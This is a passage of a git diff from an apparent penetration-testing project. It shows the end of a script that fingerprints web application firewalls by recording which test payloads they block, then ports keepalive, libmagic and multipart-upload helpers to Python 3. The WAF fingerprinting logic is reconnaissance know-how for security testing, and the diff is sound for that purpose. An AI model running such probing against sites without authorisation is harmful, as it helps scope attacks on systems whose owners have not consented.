or rejecting benign requests%s" % (hostname, (" (%d: '%s')" % (intrusive[HTTPCODE], intrusive[TITLE].strip())) if intrusive[TITLE] else ""))) + else: + time.sleep(5) + + last = check_payload(payload, protection_regex) + non_blind_check(intrusive[RAW]) + signature += struct.pack(">H", ((calc_hash(payload, binary=False) << 1) | last) & 0xffff) + results += 'x' if last else '.' 
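Each payload tested in the loop above contributes exactly two bytes to the blind signature: calc_hash() truncates a CRC-32 of the payload to 16 bits, the value is shifted left by one bit, and the lowest bit is overwritten with the rejected/not-rejected flag before being packed big-endian. A minimal standalone sketch of that marker scheme (the sample payloads are made up for illustration):

    import base64
    import struct
    import zlib

    def payload_marker(payload, rejected):
        # 16-bit truncation of CRC-32, mirroring calc_hash() above
        crc = zlib.crc32(payload.encode("utf8")) & 0xffff
        # shift left so bit 0 can carry the rejection flag, then pack as
        # a big-endian unsigned short (two bytes of the signature)
        return struct.pack(">H", ((crc << 1) | int(rejected)) & 0xffff)

    markers = [payload_marker("AND 1=1", True), payload_marker("<script>", False)]
    print(base64.b64encode(b"".join(markers)).decode("ascii"))

Because two scans of the same WAF differ at most in the rejection bit of individual markers, signatures of related deployments stay close, which is what the blind-match scoring further below exploits.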
+ + if last and info not in blocked: + blocked.append(info) + + _ = calc_hash(signature) + signature = "%s:%s" % (_.encode("hex") if not hasattr(_, "hex") else _.hex(), base64.b64encode(signature).decode("ascii")) + + print(colorize("%s[=] results: '%s'" % ("\n" if IS_TTY else "", results))) + + hardness = 100 * results.count('x') // len(results) + print(colorize("[=] hardness: %s (%d%%)" % ("insane" if hardness >= 80 else ("hard" if hardness >= 50 else ("moderate" if hardness >= 30 else "easy")), hardness))) + + if blocked: + print(colorize("[=] blocked categories: %s" % ", ".join(blocked))) + + if not results.strip('.') or not results.strip('x'): + print(colorize("[-] blind match: -")) + + if re.search(r"(?i)captcha", original[HTML]) is not None: + exit(colorize("[x] there seems to be an activated captcha")) + else: + print(colorize("[=] signature: '%s'" % signature)) + + if signature in SIGNATURES: + waf = SIGNATURES[signature] + print(colorize("[+] blind match: '%s' (100%%)" % format_name(waf))) + elif results.count('x') < MIN_MATCH_PARTIAL: + print(colorize("[-] blind match: -")) + else: + matches = {} + markers = set() + decoded = base64.b64decode(signature.split(':')[-1]) + for i in xrange(0, len(decoded), 2): + part = struct.unpack(">H", decoded[i: i + 2])[0] + markers.add(part) + + for candidate in SIGNATURES: + counter_y, counter_n = 0, 0 + decoded = base64.b64decode(candidate.split(':')[-1]) + for i in xrange(0, len(decoded), 2): + part = struct.unpack(">H", decoded[i: i + 2])[0] + if part in markers: + counter_y += 1 + elif any(_ in markers for _ in (part & ~1, part | 1)): + counter_n += 1 + result = int(round(100.0 * counter_y / (counter_y + counter_n))) + if SIGNATURES[candidate] in matches: + if result > matches[SIGNATURES[candidate]]: + matches[SIGNATURES[candidate]] = result + else: + matches[SIGNATURES[candidate]] = result + + if chained: + for _ in list(matches.keys()): + if matches[_] < 90: + del matches[_] + + if not matches: + print(colorize("[-] blind match: - ")) + print(colorize("[!] probably chained web protection systems")) + else: + matches = [(_[1], _[0]) for _ in matches.items()] + matches.sort(reverse=True) + + print(colorize("[+] blind match: %s" % ", ".join("'%s' (%d%%)" % (format_name(matches[i][1]), matches[i][0]) for i in xrange(min(len(matches), MAX_MATCHES) if matches[0][0] != 100 else 1)))) + + print() + +def main(): + if "--version" not in sys.argv: + print(BANNER) + + parse_args() + init() + run() + +load_data() + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + exit(colorize("\r[x] Ctrl-C pressed")) diff --git a/thirdparty/keepalive/keepalive.py b/thirdparty/keepalive/keepalive.py index 51a4c867099..2dda424e685 100644 --- a/thirdparty/keepalive/keepalive.py +++ b/thirdparty/keepalive/keepalive.py @@ -1,30 +1,40 @@ #!/usr/bin/env python +# -*- coding: utf-8 -*- + +# This library is free software; you can redistribute it and/or +# modify it under the terms of the GNU Lesser General Public +# License as published by the Free Software Foundation; either +# version 2.1 of the License, or (at your option) any later version. # -# Copyright 2002-2003 Michael D. Stenner -# -# This program is free software: you can redistribute it and/or modify it -# under the terms of the GNU Lesser General Public License as published -# by the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. 
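Looking back at the blind-match scoring in run() just above (before the keepalive.py hunk starts): every stored signature is decoded back into its 16-bit markers and compared with the markers observed during the current scan; an exact match counts as a hit, a marker differing only in the rejection bit counts as a miss, and the reported percentage is the hit ratio. A condensed sketch of that comparison (the zero-division guard is an addition for standalone use):

    import base64
    import struct

    def blind_match_score(observed_b64, candidate_b64):
        unpack = lambda blob: set(struct.unpack(">H", blob[i:i + 2])[0]
                                  for i in range(0, len(blob), 2))
        observed = unpack(base64.b64decode(observed_b64))
        hits = misses = 0
        for part in unpack(base64.b64decode(candidate_b64)):
            if part in observed:
                hits += 1        # same payload, same rejection outcome
            elif (part & ~1) in observed or (part | 1) in observed:
                misses += 1      # same payload, opposite rejection outcome
        return int(round(100.0 * hits / (hits + misses))) if hits + misses else 0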
-# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public License -# along with this program. If not, see . +# This library is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# Lesser General Public License for more details. # +# You should have received a copy of the GNU Lesser General Public +# License along with this library; if not, write to the +# Free Software Foundation, Inc., +# 59 Temple Place, Suite 330, +# Boston, MA 02111-1307 USA + +# This file was part of urlgrabber, a high-level cross-protocol url-grabber +# Copyright 2002-2004 Michael D. Stenner, Ryan Tomayko +# Copyright 2015 Sergio Fernández """An HTTP handler for urllib2 that supports HTTP 1.1 and keepalive. - import urllib2 - from keepalive import HTTPHandler - keepalive_handler = HTTPHandler() - opener = urllib2.build_opener(keepalive_handler) - urllib2.install_opener(opener) +>>> import urllib2 +>>> from keepalive import HTTPHandler +>>> keepalive_handler = HTTPHandler() +>>> opener = _urllib.request.build_opener(keepalive_handler) +>>> _urllib.request.install_opener(opener) +>>> +>>> fo = _urllib.request.urlopen('http://www.python.org') - fo = urllib2.urlopen('http://www.python.org') +If a connection to a given host is requested, and all of the existing +connections are still in use, another connection will be opened. If +the handler tries to use an existing connection but it fails in some +way, it will be closed and removed from the pool. To remove the handler, simply re-run build_opener with no arguments, and install that opener. @@ -37,9 +47,13 @@ close_all() open_connections() -Example: +NOTE: using the close_connection and close_all methods of the handler +should be done with care when using multiple threads. + * there is nothing that prevents another thread from creating new + connections immediately after connections are closed + * no checks are done to prevent in-use connections from being closed - keepalive_handler.close_all() +>>> keepalive_handler.close_all() EXTRA ATTRIBUTES AND METHODS @@ -55,162 +69,314 @@ If you want the best of both worlds, use this inside an AttributeError-catching try: - try: status = fo.status - except AttributeError: status = None + >>> try: status = fo.status + >>> except AttributeError: status = None Unfortunately, these are ONLY there if status == 200, so it's not easy to distinguish between non-200 responses. The reason is that urllib2 tries to do clever things with error codes 301, 302, 401, and 407, and it wraps the object upon return. - You can optionally set the module-level global HANDLE_ERRORS to 0, - in which case the handler will always return the object directly. - If you like the fancy handling of errors, don't do this. If you - prefer to see your error codes, then do. + For python versions earlier than 2.4, you can avoid this fancy error + handling by setting the module-level global HANDLE_ERRORS to zero. + You see, prior to 2.4, it's the HTTP Handler's job to determine what + to handle specially, and what to just pass up. HANDLE_ERRORS == 0 + means "pass everything up". 
In python 2.4, however, this job no + longer belongs to the HTTP Handler and is now done by a NEW handler, + HTTPErrorProcessor. Here's the bottom line: + + python version < 2.4 + HANDLE_ERRORS == 1 (default) pass up 200, treat the rest as + errors + HANDLE_ERRORS == 0 pass everything up, error processing is + left to the calling code + python version >= 2.4 + HANDLE_ERRORS == 1 pass up 200, treat the rest as errors + HANDLE_ERRORS == 0 (default) pass everything up, let the + other handlers (specifically, + HTTPErrorProcessor) decide what to do + + In practice, setting the variable either way makes little difference + in python 2.4, so for the most consistent behavior across versions, + you probably just want to use the defaults, which will give you + exceptions on errors. """ -from httplib import _CS_REQ_STARTED, _CS_REQ_SENT, _CS_IDLE, CannotSendHeader - -from lib.core.convert import unicodeencode -from lib.core.data import kb - -import threading -import urllib2 -import httplib -import socket - -VERSION = (0, 1) -#STRING_VERSION = '.'.join(map(str, VERSION)) -DEBUG = 0 -HANDLE_ERRORS = 1 -class HTTPHandler(urllib2.HTTPHandler): - def __init__(self): - self._connections = {} +from __future__ import print_function - def close_connection(self, host): - """close connection to - host is the host:port spec, as in 'www.cnn.com:8080' as passed in. - no error occurs if there is no connection to that host.""" - self._remove_connection(host, close=1) +try: + from thirdparty.six.moves import http_client as _http_client + from thirdparty.six.moves import range as _range + from thirdparty.six.moves import urllib as _urllib +except ImportError: + from six.moves import http_client as _http_client + from six.moves import range as _range + from six.moves import urllib as _urllib - def open_connections(self): - """return a list of connected hosts""" - retVal = [] - currentThread = threading.currentThread() - for name, host in self._connections.keys(): - if name == currentThread.getName(): - retVal.append(host) - return retVal +import socket +import threading - def close_all(self): - """close all open connections""" - for _, conn in self._connections.items(): - conn.close() - self._connections = {} +DEBUG = None - def _remove_connection(self, host, close=0): - key = self._get_connection_key(host) - if self._connections.has_key(key): - if close: self._connections[key].close() - del self._connections[key] +import sys +if sys.version_info < (2, 4): HANDLE_ERRORS = 1 +else: HANDLE_ERRORS = 0 - def _get_connection_key(self, host): - return (threading.currentThread().getName(), host) +class ConnectionManager: + """ + The connection manager must be able to: + * keep track of all existing + """ + def __init__(self): + self._lock = threading.Lock() + self._hostmap = {} # map hosts to a list of connections + self._connmap = {} # map connections to host + self._readymap = {} # map connection to ready state - def _start_connection(self, h, req): - h.clearheaders() + def add(self, host, connection, ready): + self._lock.acquire() try: - if req.has_data(): - data = req.get_data() - h.putrequest('POST', req.get_selector()) - if not req.headers.has_key('Content-type'): - req.headers['Content-type'] = 'application/x-www-form-urlencoded' - if not req.headers.has_key('Content-length'): - req.headers['Content-length'] = '%d' % len(data) + if host not in self._hostmap: self._hostmap[host] = [] + self._hostmap[host].append(connection) + self._connmap[connection] = host + self._readymap[connection] = ready + finally: + 
self._lock.release() + + def remove(self, connection): + self._lock.acquire() + try: + try: + host = self._connmap[connection] + except KeyError: + pass else: - h.putrequest(req.get_method() or 'GET', req.get_selector()) + del self._connmap[connection] + del self._readymap[connection] + self._hostmap[host].remove(connection) + if not self._hostmap[host]: del self._hostmap[host] + finally: + self._lock.release() + + def set_ready(self, connection, ready): + try: self._readymap[connection] = ready + except KeyError: pass + + def get_ready_conn(self, host): + conn = None + try: + self._lock.acquire() + if host in self._hostmap: + for c in self._hostmap[host]: + if self._readymap.get(c): + self._readymap[c] = 0 + conn = c + break + finally: + self._lock.release() + return conn + + def get_all(self, host=None): + if host: + return list(self._hostmap.get(host, [])) + else: + return dict(self._hostmap) - if not req.headers.has_key('Connection'): - req.headers['Connection'] = 'keep-alive' +class KeepAliveHandler: + def __init__(self): + self._cm = ConnectionManager() - for args in self.parent.addheaders: - h.putheader(*args) - for k, v in req.headers.items(): - h.putheader(k, v) - h.endheaders() - if req.has_data(): - h.send(data) - except socket.error, err: + #### Connection Management + def open_connections(self): + """return a list of connected hosts and the number of connections + to each. [('foo.com:80', 2), ('bar.org', 1)]""" + return [(host, len(li)) for (host, li) in self._cm.get_all().items()] + + def close_connection(self, host): + """close connection(s) to + host is the host:port spec, as in 'www.cnn.com:8080' as passed in. + no error occurs if there is no connection to that host.""" + for h in self._cm.get_all(host): + self._cm.remove(h) h.close() - raise urllib2.URLError(err) - def do_open(self, http_class, req): - h = None - host = req.get_host() + def close_all(self): + """close all open connections""" + for host, conns in self._cm.get_all().items(): + for h in conns: + self._cm.remove(h) + h.close() + + def _request_closed(self, request, host, connection): + """tells us that this request is now closed and the the + connection is ready for another request""" + self._cm.set_ready(connection, 1) + + def _remove_connection(self, host, connection, close=0): + if close: connection.close() + self._cm.remove(connection) + + #### Transaction Execution + def do_open(self, req): + host = req.host if not host: - raise urllib2.URLError('no host given') + raise _urllib.error.URLError('no host given') try: - need_new_connection = 1 - key = self._get_connection_key(host) - h = self._connections.get(key) - if not h is None: - try: - self._start_connection(h, req) - except: - r = None - else: - try: r = h.getresponse() - except httplib.ResponseNotReady, e: r = None - except httplib.BadStatusLine, e: r = None - - if r is None or r.version == 9: - # httplib falls back to assuming HTTP 0.9 if it gets a - # bad header back. This is most likely to happen if - # the socket has been closed by the server since we - # last used the connection. 
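The ConnectionManager defined above is the core of the keepalive support: connections are registered per host together with a ready flag, get_ready_conn() hands out an idle one and immediately marks it busy, and _request_closed() flips it back to ready once the response has been consumed. A rough sketch of that lifecycle, using a plain object as a stand-in for a real HTTP connection:

    # assumes ConnectionManager from the keepalive module above is importable
    cm = ConnectionManager()
    conn = object()

    cm.add("www.example.com:80", conn, 0)          # freshly opened, still in use
    assert cm.get_ready_conn("www.example.com:80") is None

    cm.set_ready(conn, 1)                          # response closed, connection idle
    assert cm.get_ready_conn("www.example.com:80") is conn   # handed out, busy again

    cm.remove(conn)                                # dropped from the pool entirely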
- if DEBUG: print "failed to re-use connection to %s" % host - h.close() - else: - if DEBUG: print "re-using connection to %s" % host - need_new_connection = 0 - if need_new_connection: - if DEBUG: print "creating new connection to %s" % host - h = http_class(host) - self._connections[key] = h - self._start_connection(h, req) + h = self._cm.get_ready_conn(host) + while h: + r = self._reuse_connection(h, req, host) + + # if this response is non-None, then it worked and we're + # done. Break out, skipping the else block. + if r: break + + # connection is bad - possibly closed by server + # discard it and ask for the next free connection + h.close() + self._cm.remove(h) + h = self._cm.get_ready_conn(host) + else: + # no (working) free connections were found. Create a new one. + h = self._get_connection(host) + if DEBUG: DEBUG.info("creating new connection to %s (%d)", + host, id(h)) + self._cm.add(host, h, 0) + self._start_transaction(h, req) r = h.getresponse() - except socket.error, err: - if h: h.close() - raise urllib2.URLError(err) + except (socket.error, _http_client.HTTPException) as err: + raise _urllib.error.URLError(err) + + if DEBUG: DEBUG.info("STATUS: %s, %s", r.status, r.reason) # if not a persistent connection, don't try to reuse it - if r.will_close: self._remove_connection(host) + if r.will_close: + if DEBUG: DEBUG.info('server will close connection, discarding') + self._cm.remove(h) - if DEBUG: - print "STATUS: %s, %s" % (r.status, r.reason) r._handler = self r._host = host r._url = req.get_full_url() + r._connection = h + r.code = r.status + r.headers = r.msg + r.msg = r.reason - #if r.status == 200 or not HANDLE_ERRORS: - #return r if r.status == 200 or not HANDLE_ERRORS: - # [speedplane] Must return an adinfourl object - resp = urllib2.addinfourl(r, r.msg, req.get_full_url()) - resp.code = r.status - resp.msg = r.reason - return resp; + return r + else: + return self.parent.error('http', req, r, + r.status, r.msg, r.headers) + + def _reuse_connection(self, h, req, host): + """start the transaction with a re-used connection + return a response object (r) upon success or None on failure. + This DOES not close or remove bad connections in cases where + it returns. However, if an unexpected exception occurs, it + will close and remove the connection before re-raising. + """ + try: + self._start_transaction(h, req) + r = h.getresponse() + # note: just because we got something back doesn't mean it + # worked. We'll check the version below, too. + except (socket.error, _http_client.HTTPException): + r = None + except: + # adding this block just in case we've missed + # something we will still raise the exception, but + # lets try and close the connection and remove it + # first. We previously got into a nasty loop + # where an exception was uncaught, and so the + # connection stayed open. On the next try, the + # same exception was raised, etc. The tradeoff is + # that it's now possible this call will raise + # a DIFFERENT exception + if DEBUG: DEBUG.error("unexpected exception - closing " + \ + "connection to %s (%d)", host, id(h)) + self._cm.remove(h) + h.close() + raise + + if r is None or r.version == 9: + # httplib falls back to assuming HTTP 0.9 if it gets a + # bad header back. This is most likely to happen if + # the socket has been closed by the server since we + # last used the connection. 
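As the module docstring earlier in this file shows, the handler is meant to be installed into a urllib opener once, after which every urlopen() call transparently reuses a pooled connection when one is ready. A usage sketch along those lines (the URL is only an example, and the import path assumes sqlmap's thirdparty layout):

    from thirdparty.keepalive.keepalive import HTTPHandler
    from thirdparty.six.moves import urllib as _urllib

    keepalive_handler = HTTPHandler()
    opener = _urllib.request.build_opener(keepalive_handler)
    _urllib.request.install_opener(opener)

    fo = _urllib.request.urlopen("http://www.python.org")
    fo.read()
    fo.close()                      # marks the pooled connection ready for reuse

    keepalive_handler.close_all()   # tear the pool down explicitly when done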
+ if DEBUG: DEBUG.info("failed to re-use connection to %s (%d)", + host, id(h)) + r = None else: - r.code = r.status - return self.parent.error('http', req, r, r.status, r.reason, r.msg) + if DEBUG: DEBUG.info("re-using connection to %s (%d)", host, id(h)) - def http_open(self, req): - return self.do_open(HTTPConnection, req) + return r + + def _start_transaction(self, h, req): + try: + if req.data: + data = req.data + if hasattr(req, 'selector'): + h.putrequest(req.get_method() or 'POST', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + else: + h.putrequest(req.get_method() or 'POST', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + if 'Content-type' not in req.headers: + h.putheader('Content-type', + 'application/x-www-form-urlencoded') + if 'Content-length' not in req.headers: + h.putheader('Content-length', '%d' % len(data)) + else: + if hasattr(req, 'selector'): + h.putrequest(req.get_method() or 'GET', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + else: + h.putrequest(req.get_method() or 'GET', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + except (socket.error, _http_client.HTTPException) as err: + raise _urllib.error.URLError(err) + + if 'Connection' not in req.headers: + req.headers['Connection'] = 'keep-alive' -class HTTPResponse(httplib.HTTPResponse): + for args in self.parent.addheaders: + if args[0] not in req.headers: + h.putheader(*args) + for k, v in req.headers.items(): + h.putheader(k, v) + h.endheaders() + if req.data: + h.send(data) + + def _get_connection(self, host): + return NotImplementedError +class HTTPHandler(KeepAliveHandler, _urllib.request.HTTPHandler): + def __init__(self): + KeepAliveHandler.__init__(self) + + def http_open(self, req): + return self.do_open(req) + + def _get_connection(self, host): + return HTTPConnection(host) + +class HTTPSHandler(KeepAliveHandler, _urllib.request.HTTPSHandler): + def __init__(self, ssl_factory=None): + KeepAliveHandler.__init__(self) + if not ssl_factory: + try: + import sslfactory + ssl_factory = sslfactory.get_factory() + except ImportError: + pass + self._ssl_factory = ssl_factory + + def https_open(self, req): + return self.do_open(req) + + def _get_connection(self, host): + try: return self._ssl_factory.get_https_connection(host) + except AttributeError: return HTTPSConnection(host) + +class HTTPResponse(_http_client.HTTPResponse): # we need to subclass HTTPResponse in order to # 1) add readline() and readlines() methods # 2) add close_connection() methods @@ -232,25 +398,39 @@ class HTTPResponse(httplib.HTTPResponse): def __init__(self, sock, debuglevel=0, strict=0, method=None): if method: # the httplib in python 2.3 uses the method arg - httplib.HTTPResponse.__init__(self, sock, debuglevel, method) + _http_client.HTTPResponse.__init__(self, sock, debuglevel, method) else: # 2.2 doesn't - httplib.HTTPResponse.__init__(self, sock, debuglevel) + _http_client.HTTPResponse.__init__(self, sock, debuglevel) self.fileno = sock.fileno + self.code = None self._method = method - self._rbuf = '' + self._rbuf = b"" self._rbufsize = 8096 self._handler = None # inserted by the handler later self._host = None # (same) self._url = None # (same) + self._connection = None # (same) - _raw_read = httplib.HTTPResponse.read + _raw_read = _http_client.HTTPResponse.read + + def close(self): + if 
self.fp: + self.fp.close() + self.fp = None + if self._handler: + self._handler._request_closed(self, self._host, + self._connection) + + # Note: Patch for Python3 (otherwise, connections won't be reusable) + def _close_conn(self): + self.close() def close_connection(self): + self._handler._remove_connection(self._host, self._connection, close=1) self.close() - self._handler._remove_connection(self._host, close=1) def info(self): - return self.msg + return self.headers def geturl(self): return self._url @@ -268,11 +448,11 @@ def read(self, amt=None): return s s = self._rbuf + self._raw_read(amt) - self._rbuf = '' + self._rbuf = b"" return s def readline(self, limit=-1): - data = "" + data = b"" i = self._rbuf.find('\n') while i < 0 and not (0 < limit <= len(self._rbuf)): new = self._raw_read(self._rbufsize) @@ -299,46 +479,12 @@ def readlines(self, sizehint = 0): return list -class HTTPConnection(httplib.HTTPConnection): +class HTTPConnection(_http_client.HTTPConnection): # use the modified response class response_class = HTTPResponse - _headers = None - - def clearheaders(self): - self._headers = {} - - def putheader(self, header, value): - """Send a request header line to the server. - For example: h.putheader('Accept', 'text/html') - """ - if self.__state != _CS_REQ_STARTED: - raise CannotSendHeader() - - self._headers[header] = value - - def endheaders(self): - """Indicate that the last header line has been sent to the server.""" - - if self.__state == _CS_REQ_STARTED: - self.__state = _CS_REQ_SENT - else: - raise CannotSendHeader() - - for header in ('Host', 'Accept-Encoding'): - if header in self._headers: - str = '%s: %s' % (header, self._headers[header]) - self._output(str) - del self._headers[header] - - for header, value in self._headers.items(): - str = '%s: %s' % (header, value) - self._output(str) - - self._send_output() - - def send(self, str): - httplib.HTTPConnection.send(self, unicodeencode(str, kb.pageEncoding)) +class HTTPSConnection(_http_client.HTTPSConnection): + response_class = HTTPResponse ######################################################################### ##### TEST FUNCTIONS @@ -348,85 +494,86 @@ def error_handler(url): global HANDLE_ERRORS orig = HANDLE_ERRORS keepalive_handler = HTTPHandler() - opener = urllib2.build_opener(keepalive_handler) - urllib2.install_opener(opener) + opener = _urllib.request.build_opener(keepalive_handler) + _urllib.request.install_opener(opener) pos = {0: 'off', 1: 'on'} for i in (0, 1): - print " fancy error handling %s (HANDLE_ERRORS = %i)" % (pos[i], i) + print(" fancy error handling %s (HANDLE_ERRORS = %i)" % (pos[i], i)) HANDLE_ERRORS = i try: - fo = urllib2.urlopen(url) + fo = _urllib.request.urlopen(url) foo = fo.read() fo.close() try: status, reason = fo.status, fo.reason except AttributeError: status, reason = None, None - except IOError, e: - print " EXCEPTION: %s" % e + except IOError as e: + print(" EXCEPTION: %s" % e) raise else: - print " status = %s, reason = %s" % (status, reason) + print(" status = %s, reason = %s" % (status, reason)) HANDLE_ERRORS = orig hosts = keepalive_handler.open_connections() - print "open connections:", ' '.join(hosts) + print("open connections:", hosts) keepalive_handler.close_all() def continuity(url): - import md5 + from hashlib import md5 format = '%25s: %s' # first fetch the file with the normal http handler - opener = urllib2.build_opener() - urllib2.install_opener(opener) - fo = urllib2.urlopen(url) + opener = _urllib.request.build_opener() + 
_urllib.request.install_opener(opener) + fo = _urllib.request.urlopen(url) foo = fo.read() fo.close() - m = md5.new(foo) - print format % ('normal urllib', m.hexdigest()) + m = md5(foo) + print(format % ('normal urllib', m.hexdigest())) # now install the keepalive handler and try again - opener = urllib2.build_opener(HTTPHandler()) - urllib2.install_opener(opener) + opener = _urllib.request.build_opener(HTTPHandler()) + _urllib.request.install_opener(opener) - fo = urllib2.urlopen(url) + fo = _urllib.request.urlopen(url) foo = fo.read() fo.close() - m = md5.new(foo) - print format % ('keepalive read', m.hexdigest()) + m = md5(foo) + print(format % ('keepalive read', m.hexdigest())) - fo = urllib2.urlopen(url) + fo = _urllib.request.urlopen(url) foo = '' while 1: f = fo.readline() if f: foo = foo + f else: break fo.close() - m = md5.new(foo) - print format % ('keepalive readline', m.hexdigest()) + m = md5(foo) + print(format % ('keepalive readline', m.hexdigest())) def comp(N, url): - print ' making %i connections to:\n %s' % (N, url) + print(' making %i connections to:\n %s' % (N, url)) sys.stdout.write(' first using the normal urllib handlers') # first use normal opener - opener = urllib2.build_opener() - urllib2.install_opener(opener) + opener = _urllib.request.build_opener() + _urllib.request.install_opener(opener) t1 = fetch(N, url) - print ' TIME: %.3f s' % t1 + print(' TIME: %.3f s' % t1) sys.stdout.write(' now using the keepalive handler ') # now install the keepalive handler and try again - opener = urllib2.build_opener(HTTPHandler()) - urllib2.install_opener(opener) + opener = _urllib.request.build_opener(HTTPHandler()) + _urllib.request.install_opener(opener) t2 = fetch(N, url) - print ' TIME: %.3f s' % t2 - print ' improvement factor: %.2f' % (t1/t2, ) + print(' TIME: %.3f s' % t2) + print(' improvement factor: %.2f' % (t1/t2, )) def fetch(N, url, delay=0): + import time lens = [] starttime = time.time() - for i in xrange(N): + for i in _range(N): if delay and i > 0: time.sleep(delay) - fo = urllib2.urlopen(url) + fo = _urllib.request.urlopen(url) foo = fo.read() fo.close() lens.append(len(foo)) @@ -436,22 +583,59 @@ def fetch(N, url, delay=0): for i in lens[1:]: j = j + 1 if not i == lens[0]: - print "WARNING: inconsistent length on read %i: %i" % (j, i) + print("WARNING: inconsistent length on read %i: %i" % (j, i)) return diff +def test_timeout(url): + global DEBUG + dbbackup = DEBUG + class FakeLogger: + def debug(self, msg, *args): print(msg % args) + info = warning = error = debug + DEBUG = FakeLogger() + print(" fetching the file to establish a connection") + fo = _urllib.request.urlopen(url) + data1 = fo.read() + fo.close() + + i = 20 + print(" waiting %i seconds for the server to close the connection" % i) + while i > 0: + sys.stdout.write('\r %2i' % i) + sys.stdout.flush() + time.sleep(1) + i -= 1 + sys.stderr.write('\r') + + print(" fetching the file a second time") + fo = _urllib.request.urlopen(url) + data2 = fo.read() + fo.close() + + if data1 == data2: + print(' data are identical') + else: + print(' ERROR: DATA DIFFER') + + DEBUG = dbbackup + + def test(url, N=10): - print "checking error hander (do this on a non-200)" + print("checking error hander (do this on a non-200)") try: error_handler(url) - except IOError, e: - print "exiting - exception will prevent further tests" + except IOError as e: + print("exiting - exception will prevent further tests") sys.exit() - print - print "performing continuity test (making sure stuff isn't corrupted)" + print() + 
print("performing continuity test (making sure stuff isn't corrupted)") continuity(url) - print - print "performing speed comparison" + print() + print("performing speed comparison") comp(N, url) + print() + print("performing dropped-connection check") + test_timeout(url) if __name__ == '__main__': import time @@ -460,6 +644,6 @@ def test(url, N=10): N = int(sys.argv[1]) url = sys.argv[2] except: - print "%s " % sys.argv[0] + print("%s " % sys.argv[0]) else: test(url, N) diff --git a/thirdparty/magic/magic.py b/thirdparty/magic/magic.py index 3460b4b2eb5..0a5c2575a93 100644 --- a/thirdparty/magic/magic.py +++ b/thirdparty/magic/magic.py @@ -16,10 +16,6 @@ import sys import os.path -import ctypes -import ctypes.util - -from ctypes import c_char_p, c_int, c_size_t, c_void_p class MagicException(Exception): pass @@ -104,15 +100,23 @@ def from_buffer(buffer, mime=False): try: libmagic = None + + import ctypes + import ctypes.util + + from ctypes import c_char_p, c_int, c_size_t, c_void_p + # Let's try to find magic or magic1 dll = ctypes.util.find_library('magic') or ctypes.util.find_library('magic1') # This is necessary because find_library returns None if it doesn't find the library if dll: - libmagic = ctypes.CDLL(dll) + try: + libmagic = ctypes.CDLL(dll) + except WindowsError: + pass if not libmagic or not libmagic._name: - import sys platform_to_lib = {'darwin': ['/opt/local/lib/libmagic.dylib', '/usr/local/lib/libmagic.dylib', '/usr/local/Cellar/libmagic/5.10/lib/libmagic.dylib'], @@ -194,8 +198,8 @@ def magic_load(cookie, filename): magic_compile.restype = c_int magic_compile.argtypes = [magic_t, c_char_p] -except ImportError: - from_file = from_buffer = lambda *args, **kwargs: "unknown" +except (ImportError, OSError): + from_file = from_buffer = lambda *args, **kwargs: MAGIC_UNKNOWN_FILETYPE MAGIC_NONE = 0x000000 # No flags MAGIC_DEBUG = 0x000001 # Turn on debugging @@ -218,3 +222,4 @@ def magic_load(cookie, filename): MAGIC_NO_CHECK_TROFF = 0x040000 # Don't check ascii/troff MAGIC_NO_CHECK_FORTRAN = 0x080000 # Don't check ascii/fortran MAGIC_NO_CHECK_TOKENS = 0x100000 # Don't check ascii/tokens +MAGIC_UNKNOWN_FILETYPE = b"unknown" diff --git a/thirdparty/multipart/multipartpost.py b/thirdparty/multipart/multipartpost.py index b3ea1eebd19..2f2389807ea 100644 --- a/thirdparty/multipart/multipartpost.py +++ b/thirdparty/multipart/multipartpost.py @@ -20,88 +20,95 @@ Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ -import mimetools +import io import mimetypes import os +import re import stat -import StringIO import sys -import urllib -import urllib2 +from lib.core.compat import choose_boundary +from lib.core.convert import getBytes from lib.core.exception import SqlmapDataException - - -class Callable: - def __init__(self, anycallable): - self.__call__ = anycallable +from thirdparty.six.moves import urllib as _urllib # Controls how sequences are uncoded. If true, elements may be given # multiple values by assigning a sequence. 
-doseq = 1 +doseq = True -class MultipartPostHandler(urllib2.BaseHandler): - handler_order = urllib2.HTTPHandler.handler_order - 10 # needs to run first +class MultipartPostHandler(_urllib.request.BaseHandler): + handler_order = _urllib.request.HTTPHandler.handler_order - 10 # needs to run first def http_request(self, request): - data = request.get_data() + data = request.data - if data is not None and type(data) != str: + if isinstance(data, dict): v_files = [] v_vars = [] try: for(key, value) in data.items(): - if isinstance(value, file) or hasattr(value, 'file') or isinstance(value, StringIO.StringIO): + if hasattr(value, "fileno") or hasattr(value, "file") or isinstance(value, io.IOBase): v_files.append((key, value)) else: v_vars.append((key, value)) except TypeError: systype, value, traceback = sys.exc_info() - raise SqlmapDataException, "not a valid non-string sequence or mapping object", traceback + raise SqlmapDataException("not a valid non-string sequence or mapping object '%s'" % traceback) if len(v_files) == 0: - data = urllib.urlencode(v_vars, doseq) + data = _urllib.parse.urlencode(v_vars, doseq) else: boundary, data = self.multipart_encode(v_vars, v_files) - contenttype = 'multipart/form-data; boundary=%s' % boundary - #if (request.has_header('Content-Type') and request.get_header('Content-Type').find('multipart/form-data') != 0): - # print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data') - request.add_unredirected_header('Content-Type', contenttype) + contenttype = "multipart/form-data; boundary=%s" % boundary + #if (request.has_header("Content-Type") and request.get_header("Content-Type").find("multipart/form-data") != 0): + # print "Replacing %s with %s" % (request.get_header("content-type"), "multipart/form-data") + request.add_unredirected_header("Content-Type", contenttype) + + request.data = data + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4235 + if request.data: + for match in 